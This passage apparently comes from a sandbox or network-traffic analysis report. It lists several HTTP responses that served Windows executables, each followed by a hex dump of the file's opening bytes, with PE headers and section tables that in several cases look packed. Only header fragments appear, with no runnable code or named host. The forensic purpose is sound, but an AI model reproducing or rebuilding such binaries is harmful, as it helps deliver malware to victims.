00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 b8 62 00 3c 00 00 00 00 d0 62 00 68 c3 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 65 00 ac 4e 00 00 48 a2 62 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 62 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ab 8c 62 00 00 10 00 00 00 8e 62 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 1b 00 00 00 a0 62 00 00 1c 00 00 00 92 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 08 00 00 00 c0 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 c3 02 00 00 d0 62 00 00 c4 02 00 00 ae 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 4e 00 00 00 a0 65 00 00 50 00 00 00 72 65 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:57:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 16:49:46 GMTETag: "f4400-62fffc27738b8"Accept-Ranges: bytesContent-Length: 1000448Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 31 b3 ce 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 7a 08 00 00 fe 00 00 00 00 00 00 52 c4 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 0f 00 00 06 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 16 09 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 09 00 40 45 00 00 00 80 09 00 d4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 db 08 00 18 00 00 00 98 9f 08 00 c0 00 00 00 00 00 00 00 00 00 00 00 ac 17 09 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 78 08 00 00 10 00 00 00 7a 08 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c a0 00 00 00 90 08 00 00 a2 00 00 00 80 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c 2c 00 00 00 40 09 00 00 16 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 70 09 00 00 02 00 00 00 38 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 42 00 00 00 80 09 00 00 44 00 00 00 3a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 82 05 00 00 d0 09 00 00 82 05 00 00 7e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:58:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 17:19:18 GMTETag: "1fb600-630002c1b7ee0"Accept-Ranges: bytesContent-Length: 2078208Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 ae 00 00 00 00 00 00 00 e0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4a 00 00 04 00 00 e9 b4 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 f0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 00 06 00 00 02 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 20 06 00 00 02 00 00 00 04 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 72 70 6e 6b 6f 78 72 00 90 19 00 00 40 30 00 00 8a 19 00 00 06 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6b 69 6f 74 64 65 6e 00 10 00 00 00 d0 49 00 00 04 00 00 00 90 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 49 00 00 22 00 00 00 94 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:58:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 17:45:38 GMTETag: "2cb800-630008a48d929"Accept-Ranges: bytesContent-Length: 2930688Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 ae 00 00 00 00 00 00 00 e0 2f 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 30 00 00 04 00 00 ad 25 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 d2 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 06 00 00 02 00 00 00 e2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 e4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6b 68 68 71 64 6c 64 6d 00 b0 29 00 00 20 06 00 00 aa 29 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 72 76 78 6a 79 77 77 00 10 00 00 00 d0 2f 00 00 06 00 00 00 90 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 2f 00 00 22 00 00 00 96 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:58:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 17:32:29 GMTETag: "3c3800-630005b466a31"Accept-Ranges: bytesContent-Length: 3946496Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 70 4d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 0e 25 00 00 6a 29 00 00 00 00 00 00 d0 a0 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 00 a1 00 00 04 00 00 73 ee 3c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 90 53 00 68 00 00 00 00 80 52 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 53 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 52 00 00 10 00 00 00 ea 1f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 80 52 00 00 0c 01 00 00 fa 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 53 00 00 02 00 00 00 06 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 32 00 00 a0 53 00 00 02 00 00 00 08 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 7a 65 71 68 70 73 7a 00 10 1b 00 00 b0 85 00 00 08 1b 00 00 0a 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6c 6f 65 6a 73 70 76 00 10 00 00 00 c0 a0 00 00 04 00 00 00 12 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 a0 00 00 22 00 00 00 16 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:58:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 18:32:19 GMTETag: "1ce600-630013137fad1"Accept-Ranges: bytesContent-Length: 1893888Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 1d 1b bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 74 04 00 00 b0 00 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 60 a2 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 b0 05 00 6b 00 00 00 00 a0 05 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 05 00 00 10 00 00 00 9a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 a0 05 00 00 04 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 05 00 00 02 00 00 00 ae 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 c0 05 00 00 02 00 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 77 6f 74 67 6d 67 63 00 10 1a 00 00 10 30 00 00 0e 1a 00 00 b2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 61 75 76 6b 68 74 67 00 10 00 00 00 20 4a 00 00 04 00 00 00 c0 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 4a 00 00 22 00 00 00 c4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:58:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 10 Mar 2025 17:55:13 GMTETag: "470e00-63000ac889117"Accept-Ranges: bytesContent-Length: 4656640Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 8a 6d 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 d8 34 00 00 ba 39 00 00 00 00 00 00 70 c0 00 00 10 00 00 00 70 67 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 c0 00 00 04 00 00 86 1b 47 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 d0 71 00 68 00 00 00 00 c0 70 00 bc 0a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 71 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 70 00 00 10 00 00 00 52 2b 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 bc 0a 01 00 00 c0 70 00 00 0c 01 00 00 62 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 71 00 00 02 00 00 00 6e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 34 00 00 e0 71 00 00 02 00 00 00 70 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6c 73 78 73 77 6b 6b 00 80 1a 00 00 e0 a5 00 00 76 1a 00 00 72 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 74 6c 74 6d 7a 65 61 00 10 00 00 00 60 c0 00 00 04 00 00 00 e8 46 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 c0 00 00 22 00 00 00 ec 46 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Mar 2025 18:58:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 17:15:51 GMTETag: "5b000-62fc3c638bfc0"Accept-Ranges: bytesContent-Length: 372736Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1f 51 ff ad 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 22 00 00 00 08 00 00 00 00 00 00 66 3b 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 3b 00 00 4f 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 80 3a 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 20 00 00 00 20 00 00 00 22 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 53 53 00 00 00 00 00 82 05 00 00 a0 00 00 00 82 05 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 